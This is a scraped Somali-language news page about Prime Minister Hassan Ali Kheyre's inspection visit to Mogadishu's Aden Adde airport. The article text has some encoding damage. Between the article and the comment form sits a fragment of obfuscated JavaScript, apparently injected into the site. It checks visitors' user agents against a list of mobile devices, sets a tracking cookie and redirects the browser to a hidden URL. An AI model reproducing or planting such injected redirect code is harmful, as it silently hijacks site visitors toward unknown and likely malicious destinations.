Tuesday, January 21, 2025
HomeWararSawirro:- Ra'iisul Wasaare Kheyre Oo Galabta Kormeer Ku tagay Garoonka Diyaaradaha Ee...

Sawirro:- Ra’iisul Wasaare Kheyre Oo Galabta Kormeer Ku tagay Garoonka Diyaaradaha Ee Muqdisho

Kormeerkan oo ahaa mid Shaqo ayaa Galabta waxaa Raa��iisul Wasaaraha xukuumadda Federaalka Soomaaliya Xasan Cali kheyre uu ku tegay Garoonka diyaaradaha Aadan-Cadde ee Magalada Muqdisho oo ka mid ah Ilaha Dhaqaalaha dalka.

Raa��iisul Wasaare kheyre ayaa kormeeray Goobaha Shaqooyinka Garoonka ay ka socdaan sida,qeybta ay ka dhoofaan dadka aada Gobolada dalka,qeybta dadka u dhoofaya dibada iyo xafiiska Haya��adda socdaalka iyo jinsiyadaha ay ku leedahay garoonka.

Maareyaha Garoonka CabdiAshkir oo Warbaahinta la hadlay ayaa sheegay in u jeedka kormeerka ee Raa��iisul Wasaaraha uu ahaa in uu xog-wareysi la yeesho dadka loogu adeegayo Garoonka iyo in ay caqabado la kulmaan xilliyada Shaqooyinka loo qabanayo.

Waxa uu sheegay sidoo kale in raa��iisul Wasaaraha indhihiisa ku arkay howlaha horumarka ah ee ka socda Gudaha Garoonka Diyaaradaha ee Magalada muqdisho.

)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe